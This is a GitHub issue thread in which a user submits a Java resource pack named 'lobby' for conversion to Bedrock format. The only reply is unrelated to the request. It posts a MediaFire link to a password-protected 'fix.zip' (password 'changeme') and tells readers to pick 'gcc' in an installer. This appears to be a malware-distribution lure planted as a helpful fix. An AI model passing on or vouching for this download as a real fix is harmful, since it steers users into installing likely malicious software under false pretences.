### ISSUE TITLE
[Pack]: lobby

### ISSUE THREAD

**Issue by D1aloO** [Kas-tle/java2bedrock.sh#33313]
### Java Pack Direct Download URL

https://www.dropbox.com/scl/fi/brz5gq32g14jtteiycivf/generated-3.zip?rlkey=uazvbfvcapkrsasuekqwk6a02&st=5jrm39vh&dl=0

### Default Assets Version

None

### Block Material

None

### Attachable Material

None

### Archive Scratch Files

None

### Rename Model Files

true

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
